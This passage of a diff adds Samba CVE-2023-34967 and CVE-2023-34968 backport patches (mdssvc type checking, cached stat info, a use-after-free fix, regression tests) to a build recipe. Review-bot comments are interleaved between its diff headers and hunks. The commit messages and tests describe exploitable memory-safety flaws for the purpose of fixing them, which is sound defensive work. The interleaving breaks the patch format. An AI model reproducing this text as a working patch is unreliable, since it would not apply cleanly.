"dalloc_add failed\n"); ++ ++ torture_comment(tctx, "%s", dalloc_dump(d, 0)); ++ ++ request_blob.spotlight_blob = talloc_array(tctx, ++ uint8_t, ++ 64 * 1024); ++ torture_assert_not_null_goto(tctx, 
request_blob.spotlight_blob, ++ ok, done, "dalloc_new failed\n"); ++ request_blob.size = 64 * 1024; ++ ++ request_blob.length = sl_pack(d, ++ (char *)request_blob.spotlight_blob, ++ request_blob.size); ++ torture_assert_goto(tctx, request_blob.length > 0, ++ ok, done, "sl_pack failed\n"); ++ ++ response_blob.spotlight_blob = talloc_array(state, uint8_t, 0); ++ torture_assert_not_null_goto(tctx, response_blob.spotlight_blob, ++ ok, done, "dalloc_zero failed\n"); ++ response_blob.size = 0; ++ ++ status = dcerpc_mdssvc_cmd(b, ++ state, ++ &state->ph, ++ 0, ++ device_id, ++ unkn2, ++ 0, ++ flags, ++ request_blob, ++ 0, ++ 64 * 1024, ++ 1, ++ 64 * 1024, ++ 0, ++ 0, ++ &fragment, ++ &response_blob, ++ &unkn9); ++ torture_assert_ntstatus_ok_goto( ++ tctx, status, ok, done, ++ "dcerpc_mdssvc_cmd failed\n"); ++ ++done: ++ return ok; ++} ++ + static bool test_mdssvc_invalid_ph_close(struct torture_context *tctx, + void *data) + { +@@ -940,6 +1070,10 @@ struct torture_suite *torture_rpc_mdssvc(TALLOC_CTX *mem_ctx) + torture_tcase_add_simple_test(tcase, + "mdssvc_sl_unpack_loop", + test_mdssvc_sl_unpack_loop); ++ torture_tcase_add_simple_test(tcase, ++ "sl_dict_type_safety", ++ test_sl_dict_type_safety); ++ + + return suite; + } +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34967_0002.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34967_0002.patch new file mode 100644 index 0000000000..2e4907ab62 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34967_0002.patch 
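Review bot: In test_sl_dict_type_safety() the null check that follows `arg = dalloc_zero(array1, sl_dict_t);` tests `d` instead of `arg`, so a failed allocation of the dict is not caught and the following `dalloc_stradd(arg, ...)` calls run on NULL. The check should read `torture_assert_not_null_goto(tctx, arg, ok, done, "dalloc_zero failed\n");`. Several failure strings are also copied from neighbouring calls: both `dalloc_add_copy()` checks report "dalloc_stradd failed", and the `array2` and request-blob allocations report "dalloc_new failed". That will mislead whoever reads a failing run of this regression test.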
@@ -0,0 +1,125 @@ +From 049c13245649fab412b61a5b55e5a7dea72d7c72 Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Fri, 26 May 2023 15:06:38 +0200 +Subject: [PATCH] CVE-2023-34967: mdssvc: add type checking to + dalloc_value_for_key() + +Change the dalloc_value_for_key() function to require an additional final +argument which denotes the expected type of the value associated with a key. If +the types don't match, return NULL. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15341 + +Signed-off-by: Ralph Boehme <slow@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/4c60e35add4a1abd04334012a8d6edf1c3f396ba] + +CVE: CVE-2023-34967 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source3/rpc_server/mdssvc/dalloc.c | 14 ++++++++++---- + source3/rpc_server/mdssvc/mdssvc.c | 17 +++++++++++++---- + 2 files changed, 23 insertions(+), 8 deletions(-) + +diff --git a/source3/rpc_server/mdssvc/dalloc.c b/source3/rpc_server/mdssvc/dalloc.c +index 007702d..8b79b41 100644 +--- a/source3/rpc_server/mdssvc/dalloc.c ++++ b/source3/rpc_server/mdssvc/dalloc.c +@@ -159,7 +159,7 @@ void *dalloc_value_for_key(const DALLOC_CTX *d, ...) + int result = 0; + void *p = NULL; + va_list args; +- const char *type; ++ const char *type = NULL; + int elem; + size_t array_len; + +@@ -170,7 +170,6 @@ void *dalloc_value_for_key(const DALLOC_CTX *d, ...) + array_len = talloc_array_length(d->dd_talloc_array); + elem = va_arg(args, int); + if (elem >= array_len) { +- va_end(args); + result = -1; + goto done; + } +@@ -178,8 +177,6 @@ void *dalloc_value_for_key(const DALLOC_CTX *d, ...) + type = va_arg(args, const char *); + } + +- va_end(args); +- + array_len = talloc_array_length(d->dd_talloc_array); + + for (elem = 0; elem + 1 < array_len; elem += 2) { +@@ -192,8 +189,17 @@ void *dalloc_value_for_key(const DALLOC_CTX *d, ...) 
+ break; + } + } ++ if (p == NULL) { ++ goto done; ++ } ++ ++ type = va_arg(args, const char *); ++ if (strcmp(talloc_get_name(p), type) != 0) { ++ p = NULL; ++ } + + done: ++ va_end(args); + if (result != 0) { + p = NULL; + } +diff --git a/source3/rpc_server/mdssvc/mdssvc.c b/source3/rpc_server/mdssvc/mdssvc.c +index a983a88..fe6e0c2 100644 +--- a/source3/rpc_server/mdssvc/mdssvc.c ++++ b/source3/rpc_server/mdssvc/mdssvc.c +@@ -884,7 +884,8 @@ static bool slrpc_open_query(struct mds_ctx *mds_ctx, + + querystring = dalloc_value_for_key(query, "DALLOC_CTX", 0, + "DALLOC_CTX", 1, +- "kMDQueryString"); ++ "kMDQueryString", ++ "char *"); + if (querystring == NULL) { + DEBUG(1, ("missing kMDQueryString\n")); + goto error; +@@ -924,8 +925,11 @@ static bool slrpc_open_query(struct mds_ctx *mds_ctx, + slq->ctx2 = *uint64p; + + path_scope = dalloc_value_for_key(query, "DALLOC_CTX", 0, +- "DALLOC_CTX", 1, "kMDScopeArray"); ++ "DALLOC_CTX", 1, ++ "kMDScopeArray", ++ "sl_array_t"); + if (path_scope == NULL) { ++ DBG_ERR("missing kMDScopeArray\n"); + goto error; + } + +@@ -940,8 +944,11 @@ static bool slrpc_open_query(struct mds_ctx *mds_ctx, + } + + reqinfo = dalloc_value_for_key(query, "DALLOC_CTX", 0, +- "DALLOC_CTX", 1, "kMDAttributeArray"); ++ "DALLOC_CTX", 1, ++ "kMDAttributeArray", ++ "sl_array_t"); + if (reqinfo == NULL) { ++ DBG_ERR("missing kMDAttributeArray\n"); + goto error; + } + +@@ -949,7 +956,9 @@ static bool slrpc_open_query(struct mds_ctx *mds_ctx, + DEBUG(10, ("requested attributes: %s", dalloc_dump(reqinfo, 0))); + + cnids = dalloc_value_for_key(query, "DALLOC_CTX", 0, +- "DALLOC_CTX", 1, "kMDQueryItemArray"); ++ "DALLOC_CTX", 1, ++ "kMDQueryItemArray", ++ "sl_array_t"); + if (cnids) { + ok = sort_cnids(slq, cnids->ca_cnids); + if (!ok) { +-- +2.40.0 
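Review bot: dalloc_value_for_key() now reads one more variadic argument after the key and passes it straight to `strcmp()`, but nothing in the prototype lets the compiler flag a call that omits it, and the hunk adds no documentation of the new contract (the function starts and ends outside the hunk). The four calls in slrpc_open_query() are converted here; any caller not shown in this patch would read an argument that was never passed. I would state the contract in the comment above the function, e.g. `The argument after the key is the expected talloc type name of the value ("char *", "sl_array_t"); NULL is returned if the stored value has a different type.` The `From` hash (049c1324...) and the commit named in Upstream-Status (4c60e35a...) also differ, unlike in the sibling patches, so it is worth confirming which commit this was taken from.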
diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0001.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0001.patch
new file mode 100644
index 0000000000..ad8e3e4ce3
--- /dev/null
+++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0001.patch
@@ -0,0 +1,104 @@ +From 98b2a013bc723cd660978d5a1db40b987816f90e Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Tue, 6 Jun 2023 15:17:26 +0200 +Subject: [PATCH] CVE-2023-34968: mdssvc: cache and reuse stat info in struct + sl_inode_path_map + +Prepare for the "path" being a fake path and not the real server-side +path where we won't be able to vfs_stat_fsp() this fake path. Luckily we already +got stat info for the object in mds_add_result() so we can just pass stat info +from there. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388 + +Signed-off-by: Ralph Boehme <slow@samba.org> +Reviewed-by: Stefan Metzmacher <metze@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/98b2a013bc723cd660978d5a1db40b987816f90e] + +CVE: CVE-2023-34968 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source3/rpc_server/mdssvc/mdssvc.c | 32 +++++++----------------------- + source3/rpc_server/mdssvc/mdssvc.h | 1 + + 2 files changed, 8 insertions(+), 25 deletions(-) + +diff --git a/source3/rpc_server/mdssvc/mdssvc.c b/source3/rpc_server/mdssvc/mdssvc.c +index 26a3ec7..a6cc653 100644 +--- a/source3/rpc_server/mdssvc/mdssvc.c ++++ b/source3/rpc_server/mdssvc/mdssvc.c +@@ -446,7 +446,10 @@ static int ino_path_map_destr_cb(struct sl_inode_path_map *entry) + * entries by calling talloc_free() on the query slq handles. 
+ **/ + +-static bool inode_map_add(struct sl_query *slq, uint64_t ino, const char *path) ++static bool inode_map_add(struct sl_query *slq, ++ uint64_t ino, ++ const char *path, ++ struct stat_ex *st) + { + NTSTATUS status; + struct sl_inode_path_map *entry; +@@ -493,6 +496,7 @@ static bool inode_map_add(struct sl_query *slq, uint64_t ino, const char *path) + + entry->ino = ino; + entry->mds_ctx = slq->mds_ctx; ++ entry->st = *st; + entry->path = talloc_strdup(entry, path); + if (entry->path == NULL) { + DEBUG(1, ("talloc failed\n")); +@@ -629,7 +633,7 @@ bool mds_add_result(struct sl_query *slq, const char *path) + return false; + } + +- ok = inode_map_add(slq, ino64, path); ++ ok = inode_map_add(slq, ino64, path, &sb); + if (!ok) { + DEBUG(1, ("inode_map_add error\n")); + slq->state = SLQ_STATE_ERROR; +@@ -1350,29 +1354,7 @@ static bool slrpc_fetch_attributes(struct mds_ctx *mds_ctx, + elem = talloc_get_type_abort(p, struct sl_inode_path_map); + path = elem->path; + +- status = synthetic_pathref(talloc_tos(), +- mds_ctx->conn->cwd_fsp, +- path, +- NULL, +- NULL, +- 0, +- 0, +- &smb_fname); +- if (!NT_STATUS_IS_OK(status)) { +- /* This is not an error, the user may lack permissions */ +- DBG_DEBUG("synthetic_pathref [%s]: %s\n", +- smb_fname_str_dbg(smb_fname), +- nt_errstr(status)); +- return true; +- } +- +- result = SMB_VFS_FSTAT(smb_fname->fsp, &smb_fname->st); +- if (result != 0) { +- TALLOC_FREE(smb_fname); +- return true; +- } +- +- sp = &smb_fname->st; ++ sp = &elem->st; + } + + ok = add_filemeta(mds_ctx, reqinfo, fm_array, path, sp); +diff --git a/source3/rpc_server/mdssvc/mdssvc.h b/source3/rpc_server/mdssvc/mdssvc.h +index 3924827..a097991 100644 +--- a/source3/rpc_server/mdssvc/mdssvc.h ++++ b/source3/rpc_server/mdssvc/mdssvc.h +@@ -105,6 +105,7 @@ struct sl_inode_path_map { + struct mds_ctx *mds_ctx; + uint64_t ino; + char *path; ++ struct stat_ex st; + }; + + /* Per process state */ +-- +2.40.0 
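Review bot: The new `struct stat_ex st;` member of struct sl_inode_path_map has no comment saying that it is a snapshot, although slrpc_fetch_attributes() now serves it instead of calling `synthetic_pathref()` and `SMB_VFS_FSTAT()` when attributes are fetched. The removed branch also returned early when the path could not be opened ("the user may lack permissions"), so the attributes returned now depend only on whatever was checked when mds_add_result() added the entry. That appears to be what the commit message intends, but it should be written down where the data lives, e.g. `/* stat snapshot from mds_add_result(); not refreshed when attributes are fetched */`. The new parameter can also be `const struct stat_ex *st`, since inode_map_add() only copies from it; both function bodies extend beyond the hunk.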
diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0002.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0002.patch
new file mode 100644
index 0000000000..21b98c4d7e
--- /dev/null
+++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0002.patch
@@ -0,0 +1,39 @@
+From 47a0c1681dd1e7ec407679793966ec8bdc08a24e Mon Sep 17 00:00:00 2001
+From: Ralph Boehme <slow@samba.org>
+Date: Sat, 17 Jun 2023 13:39:55 +0200
+Subject: [PATCH] CVE-2023-34968: mdssvc: add missing "kMDSStoreMetaScopes"
+ dict key in slrpc_fetch_properties()
+
+We were adding the value, but not the key.
+
+BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388
+
+Signed-off-by: Ralph Boehme <slow@samba.org>
+Reviewed-by: Stefan Metzmacher <metze@samba.org>
+
+Upstream-Status: Backport [https://github.com/samba-team/samba/commit/47a0c1681dd1e7ec407679793966ec8bdc08a24e]
+
+CVE: CVE-2023-34968
+
+Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com>
+---
+ source3/rpc_server/mdssvc/mdssvc.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/source3/rpc_server/mdssvc/mdssvc.c b/source3/rpc_server/mdssvc/mdssvc.c
+index a6d09a43b9c..9c23ef95753 100644
+--- a/source3/rpc_server/mdssvc/mdssvc.c
++++ b/source3/rpc_server/mdssvc/mdssvc.c
+@@ -730,6 +730,10 @@ static bool slrpc_fetch_properties(struct mds_ctx *mds_ctx,
+ }
+
+ /* kMDSStoreMetaScopes array */
++ result = dalloc_stradd(dict, "kMDSStoreMetaScopes");
++ if (result != 0) {
++ return false;
++ }
+ array = dalloc_zero(dict, sl_array_t);
+ if (array == NULL) {
+ return NULL;
+--
+2.40.0
diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0003.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0003.patch
new file mode 100644
index 0000000000..42106d82b8
--- /dev/null
+++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0003.patch
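Review bot: The added error path in slrpc_fetch_properties() returns `false`, while the unchanged allocation check two lines below still does `return NULL;` in the same bool function. Both evaluate to false, but the mix reads as if the function returned a pointer; the context line would be clearer as `return false;` so the two adjacent failure paths match. The function body extends outside the hunk, so other returns in it were not checked.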
@@ -0,0 +1,65 @@ +From 56a21b3bc8fb24416ead9061f9305c8122bc7f86 Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Mon, 19 Jun 2023 17:14:38 +0200 +Subject: [PATCH] CVE-2023-34968: mdscli: use correct TALLOC memory context + when allocating spotlight_blob + +d is talloc_free()d at the end of the functions and the buffer was later used +after beeing freed in the DCERPC layer when sending the packet. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388 + +Signed-off-by: Ralph Boehme <slow@samba.org> +Reviewed-by: Stefan Metzmacher <metze@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/56a21b3bc8fb24416ead9061f9305c8122bc7f86] + +CVE: CVE-2023-34968 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source3/rpc_client/cli_mdssvc_util.c | 8 ++++---- + 1 file changed, 4 insertions(+), 4 deletions(-) + +diff --git a/source3/rpc_client/cli_mdssvc_util.c b/source3/rpc_client/cli_mdssvc_util.c +index fe5092c3790..892a844e71a 100644 +--- a/source3/rpc_client/cli_mdssvc_util.c ++++ b/source3/rpc_client/cli_mdssvc_util.c +@@ -209,7 +209,7 @@ NTSTATUS mdscli_blob_search(TALLOC_CTX *mem_ctx, + return NT_STATUS_NO_MEMORY; + } + +- blob->spotlight_blob = talloc_array(d, ++ blob->spotlight_blob = talloc_array(mem_ctx, + uint8_t, + ctx->max_fragment_size); + if (blob->spotlight_blob == NULL) { +@@ -293,7 +293,7 @@ NTSTATUS mdscli_blob_get_results(TALLOC_CTX *mem_ctx, + return NT_STATUS_NO_MEMORY; + } + +- blob->spotlight_blob = talloc_array(d, ++ blob->spotlight_blob = talloc_array(mem_ctx, + uint8_t, + ctx->max_fragment_size); + if (blob->spotlight_blob == NULL) { +@@ -426,7 +426,7 @@ NTSTATUS mdscli_blob_get_path(TALLOC_CTX *mem_ctx, + return NT_STATUS_NO_MEMORY; + } + +- blob->spotlight_blob = talloc_array(d, ++ blob->spotlight_blob = talloc_array(mem_ctx, + uint8_t, + ctx->max_fragment_size); + if (blob->spotlight_blob == NULL) { +@@ -510,7 +510,7 @@ NTSTATUS mdscli_blob_close_search(TALLOC_CTX 
*mem_ctx, + return NT_STATUS_NO_MEMORY; + } + +- blob->spotlight_blob = talloc_array(d, ++ blob->spotlight_blob = talloc_array(mem_ctx, + uint8_t, + ctx->max_fragment_size); + if (blob->spotlight_blob == NULL) { +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0004.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0004.patch new file mode 100644 index 0000000000..785908b528 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0004.patch 
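Review bot: The four `talloc_array(mem_ctx, ...)` calls in mdscli_blob_search(), mdscli_blob_get_results(), mdscli_blob_get_path() and mdscli_blob_close_search() differ from the old code only in the parent context, and nothing at the call sites says why. A later cleanup could move the buffer back under `d` and bring back the use after free described in the commit message. I would add a comment at each site, e.g. `/* Parent must be mem_ctx: d is freed before the DCERPC layer sends this buffer */`. Because the buffer is no longer released together with `d`, the failure paths after the allocation, which lie outside the hunk, should be checked for whether they free `blob->spotlight_blob` or leave that to the owner of `mem_ctx`.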
@@ -0,0 +1,85 @@ +From 0ae6084d1a9c4eb12e9f1ab1902e00f96bcbea55 Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Mon, 19 Jun 2023 18:28:41 +0200 +Subject: [PATCH] CVE-2023-34968: mdscli: remove response blob allocation + +This is handled by the NDR code transparently. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388 + +Signed-off-by: Ralph Boehme <slow@samba.org> +Reviewed-by: Stefan Metzmacher <metze@samba.org> +--- + source3/rpc_client/cli_mdssvc.c | 36 --------------------------------- + 1 file changed, 36 deletions(-) + +diff --git a/source3/rpc_client/cli_mdssvc.c b/source3/rpc_client/cli_mdssvc.c +index 046d37135cb..474d7c0b150 100644 +--- a/source3/rpc_client/cli_mdssvc.c ++++ b/source3/rpc_client/cli_mdssvc.c +@@ -276,15 +276,6 @@ struct tevent_req *mdscli_search_send(TALLOC_CTX *mem_ctx, + return tevent_req_post(req, ev); + } + +- state->response_blob.spotlight_blob = talloc_array( +- state, +- uint8_t, +- mdscli_ctx->max_fragment_size); +- if (tevent_req_nomem(state->response_blob.spotlight_blob, req)) { +- return tevent_req_post(req, ev); +- } +- state->response_blob.size = mdscli_ctx->max_fragment_size; +- + subreq = dcerpc_mdssvc_cmd_send(state, + ev, + mdscli_ctx->bh, +@@ -457,15 +448,6 @@ struct tevent_req *mdscli_get_results_send( + return tevent_req_post(req, ev); + } + +- state->response_blob.spotlight_blob = talloc_array( +- state, +- uint8_t, +- mdscli_ctx->max_fragment_size); +- if (tevent_req_nomem(state->response_blob.spotlight_blob, req)) { +- return tevent_req_post(req, ev); +- } +- state->response_blob.size = mdscli_ctx->max_fragment_size; +- + subreq = dcerpc_mdssvc_cmd_send(state, + ev, + mdscli_ctx->bh, +@@ -681,15 +663,6 @@ struct tevent_req *mdscli_get_path_send(TALLOC_CTX *mem_ctx, + return tevent_req_post(req, ev); + } + +- state->response_blob.spotlight_blob = talloc_array( +- state, +- uint8_t, +- mdscli_ctx->max_fragment_size); +- if (tevent_req_nomem(state->response_blob.spotlight_blob, req)) { +- 
return tevent_req_post(req, ev); +- } +- state->response_blob.size = mdscli_ctx->max_fragment_size; +- + subreq = dcerpc_mdssvc_cmd_send(state, + ev, + mdscli_ctx->bh, +@@ -852,15 +825,6 @@ struct tevent_req *mdscli_close_search_send(TALLOC_CTX *mem_ctx, + return tevent_req_post(req, ev); + } + +- state->response_blob.spotlight_blob = talloc_array( +- state, +- uint8_t, +- mdscli_ctx->max_fragment_size); +- if (tevent_req_nomem(state->response_blob.spotlight_blob, req)) { +- return tevent_req_post(req, ev); +- } +- state->response_blob.size = mdscli_ctx->max_fragment_size; +- + subreq = dcerpc_mdssvc_cmd_send(state, + ev, + mdscli_ctx->bh, +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0005.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0005.patch new file mode 100644 index 0000000000..308b441e95 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0005.patch 
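Review bot: The header of CVE-2023-34968_0004.patch stops at `Reviewed-by:` and has no `Upstream-Status:`, `CVE:` or backporter `Signed-off-by:` line, unlike the other CVE-2023-34968 patches in this series. Without them the origin of the change cannot be checked from the file itself. Assuming the `From` hash is the upstream commit, as in the sibling patches, the header should gain `Upstream-Status: Backport [https://github.com/samba-team/samba/commit/0ae6084d1a9c4eb12e9f1ab1902e00f96bcbea55]` and `CVE: CVE-2023-34968`, plus the backporter's sign-off.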
@@ -0,0 +1,83 @@ +From 353a9ccea6ff93ea2cd604dcc2b0372f056f819d Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Tue, 20 Jun 2023 11:28:47 +0200 +Subject: [PATCH] CVE-2023-34968: smbtorture: remove response blob allocation + in mdssvc.c + +This is alreay done by NDR for us. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388 + +Signed-off-by: Ralph Boehme <slow@samba.org> +Reviewed-by: Stefan Metzmacher <metze@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/353a9ccea6ff93ea2cd604dcc2b0372f056f819d] + +CVE: CVE-2023-34968 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> + +--- + source4/torture/rpc/mdssvc.c | 26 -------------------------- + 1 file changed, 26 deletions(-) + +diff --git a/source4/torture/rpc/mdssvc.c b/source4/torture/rpc/mdssvc.c +index 3689692f7de..a16bd5b47e3 100644 +--- a/source4/torture/rpc/mdssvc.c ++++ b/source4/torture/rpc/mdssvc.c +@@ -536,13 +536,6 @@ static bool test_mdssvc_invalid_ph_cmd(struct torture_context *tctx, + request_blob.length = 0; + request_blob.size = 0; + +- response_blob.spotlight_blob = talloc_array(state, +- uint8_t, +- 0); +- torture_assert_not_null_goto(tctx, response_blob.spotlight_blob, +- ok, done, "dalloc_zero failed\n"); +- response_blob.size = 0; +- + status = dcerpc_mdssvc_cmd(b, + state, + &ph, +@@ -632,13 +625,6 @@ static bool test_mdssvc_sl_unpack_loop(struct torture_context *tctx, + request_blob.size = sizeof(test_sl_unpack_loop_buf); + request_blob.length = sizeof(test_sl_unpack_loop_buf); + +- response_blob.spotlight_blob = talloc_array(state, +- uint8_t, +- 0); +- torture_assert_not_null_goto(tctx, response_blob.spotlight_blob, +- ok, done, "dalloc_zero failed\n"); +- response_blob.size = 0; +- + status = dcerpc_mdssvc_cmd(b, + state, + &state->ph, +@@ -764,11 +750,6 @@ static bool test_sl_dict_type_safety(struct torture_context *tctx, + torture_assert_goto(tctx, request_blob.length > 0, + ok, done, "sl_pack failed\n"); + 
+- response_blob.spotlight_blob = talloc_array(state, uint8_t, 0); +- torture_assert_not_null_goto(tctx, response_blob.spotlight_blob, +- ok, done, "dalloc_zero failed\n"); +- response_blob.size = 0; +- + status = dcerpc_mdssvc_cmd(b, + state, + &state->ph, +@@ -926,13 +907,6 @@ static bool test_mdssvc_fetch_attr_unknown_cnid(struct torture_context *tctx, + ret, done, "dalloc_zero failed\n"); + request_blob.size = max_fragment_size; + +- response_blob.spotlight_blob = talloc_array(state, +- uint8_t, +- max_fragment_size); +- torture_assert_not_null_goto(tctx, response_blob.spotlight_blob, +- ret, done, "dalloc_zero failed\n"); +- response_blob.size = max_fragment_size; +- + len = sl_pack(d, (char *)request_blob.spotlight_blob, request_blob.size); + torture_assert_goto(tctx, len != -1, ret, done, "sl_pack failed\n"); + +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0006.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0006.patch new file mode 100644 index 0000000000..34526a8c8e --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0006.patch 
@@ -0,0 +1,57 @@
+From 449f1280b718c6da3b8e309fe124be4e9bfd8184 Mon Sep 17 00:00:00 2001
+From: Ralph Boehme <slow@samba.org>
+Date: Tue, 20 Jun 2023 11:35:41 +0200
+Subject: [PATCH] CVE-2023-34968: rpcclient: remove response blob allocation
+
+This is alreay done by NDR for us.
+
+BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388
+
+Signed-off-by: Ralph Boehme <slow@samba.org>
+Reviewed-by: Stefan Metzmacher <metze@samba.org>
+
+Upstream-Status: Backport [https://github.com/samba-team/samba/commit/449f1280b718c6da3b8e309fe124be4e9bfd8184]
+
+CVE: CVE-2023-34968
+
+Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com>
+---
+ source3/rpcclient/cmd_spotlight.c | 16 ----------------
+ 1 file changed, 16 deletions(-)
+
+diff --git a/source3/rpcclient/cmd_spotlight.c b/source3/rpcclient/cmd_spotlight.c
+index 24db9893df6..64fe321089c 100644
+--- a/source3/rpcclient/cmd_spotlight.c
++++ b/source3/rpcclient/cmd_spotlight.c
+@@ -144,13 +144,6 @@ static NTSTATUS cmd_mdssvc_fetch_properties(
+ }
+ request_blob.size = max_fragment_size;
+
+- response_blob.spotlight_blob = talloc_array(mem_ctx, uint8_t, max_fragment_size);
+- if (response_blob.spotlight_blob == NULL) {
+- status = NT_STATUS_INTERNAL_ERROR;
+- goto done;
+- }
+- response_blob.size = max_fragment_size;
+-
+ len = sl_pack(d, (char *)request_blob.spotlight_blob, request_blob.size);
+ if (len == -1) {
+ status = NT_STATUS_INTERNAL_ERROR;
+@@ -368,15 +361,6 @@ static NTSTATUS cmd_mdssvc_fetch_attributes(
+ }
+ request_blob.size = max_fragment_size;
+
+- response_blob.spotlight_blob = talloc_array(mem_ctx,
+- uint8_t,
+- max_fragment_size);
+- if (response_blob.spotlight_blob == NULL) {
+- status = NT_STATUS_INTERNAL_ERROR;
+- goto done;
+- }
+- response_blob.size = max_fragment_size;
+-
+ len = sl_pack(d, (char *)request_blob.spotlight_blob, request_blob.size);
+ if (len == -1) {
+ status = NT_STATUS_INTERNAL_ERROR;
+--
+2.40.0
diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0007.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0007.patch
new file mode 100644
index 0000000000..679e174c05
--- /dev/null
+++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0007.patch
@@ -0,0 +1,49 @@
+From cc593a6ac531f02f2fe70fd4f7dfe649a02f9206 Mon Sep 17 00:00:00 2001
+From: Ralph Boehme <slow@samba.org>
+Date: Tue, 20 Jun 2023 11:42:10 +0200
+Subject: [PATCH] CVE-2023-34968: mdssvc: remove response blob allocation
+
+This is alreay done by NDR for us.
+
+BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388
+
+Signed-off-by: Ralph Boehme <slow@samba.org>
+Reviewed-by: Stefan Metzmacher <metze@samba.org>
+
+Upstream-Status: Backport [https://github.com/samba-team/samba/commit/cc593a6ac531f02f2fe70fd4f7dfe649a02f9206]
+
+CVE: CVE-2023-34968
+
+Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com>
+---
+ source3/rpc_server/mdssvc/srv_mdssvc_nt.c | 8 --------
+ 1 file changed, 8 deletions(-)
+
+diff --git a/source3/rpc_server/mdssvc/srv_mdssvc_nt.c b/source3/rpc_server/mdssvc/srv_mdssvc_nt.c
+index b8eed8b..714e6c1 100644
+--- a/source3/rpc_server/mdssvc/srv_mdssvc_nt.c
++++ b/source3/rpc_server/mdssvc/srv_mdssvc_nt.c
+@@ -209,7 +209,6 @@ void _mdssvc_unknown1(struct pipes_struct *p, struct mdssvc_unknown1 *r)
+ void _mdssvc_cmd(struct pipes_struct *p, struct mdssvc_cmd *r)
+ {
+ bool ok;
+- char *rbuf;
+ struct mds_ctx *mds_ctx;
+ NTSTATUS status;
+
+@@ -266,13 +265,6 @@ void _mdssvc_cmd(struct pipes_struct *p, struct mdssvc_cmd *r)
+ return;
+ }
+
+- rbuf = talloc_zero_array(p->mem_ctx, char, r->in.max_fragment_size1);
+- if (rbuf == NULL) {
+- p->fault_state = DCERPC_FAULT_CANT_PERFORM;
+- return;
+- }
+- r->out.response_blob->spotlight_blob = (uint8_t *)rbuf;
+- r->out.response_blob->size = r->in.max_fragment_size1;
+
+ /* We currently don't use fragmentation at the mdssvc RPC layer */
+ *r->out.fragment = 0;
+--
+2.40.0
diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0008.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0008.patch
new file mode 100644
index 0000000000..e65379fe83
--- /dev/null
+++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0008.patch
@@ -0,0 +1,62 @@
+From 397919e82b493206ae9b60bb9c539d52c3207729 Mon Sep 17 00:00:00 2001
+From: Archana Polampalli <archana.polampalli@windriver.com>
+Date: Fri, 29 Sep 2023 08:59:31 +0000
+Subject: [PATCH] CVE-2023-34968: mdssvc: switch to doing an early return
+
+Just reduce indentation of the code handling the success case. No change in
+behaviour.
+
+BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388
+
+Signed-off-by: Ralph Boehme <slow@samba.org>
+Reviewed-by: Stefan Metzmacher <metze@samba.org>
+
+Upstream-Status: Backport [https://github.com/samba-team/samba/commit/397919e82b493206ae9b60bb9c539d52c3207729]
+
+CVE: CVE-2023-34968
+
+Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com>
+---
+ source3/rpc_server/mdssvc/mdssvc.c | 26 ++++++++++++++------------
+ 1 file changed, 14 insertions(+), 12 deletions(-)
+
+diff --git a/source3/rpc_server/mdssvc/mdssvc.c b/source3/rpc_server/mdssvc/mdssvc.c
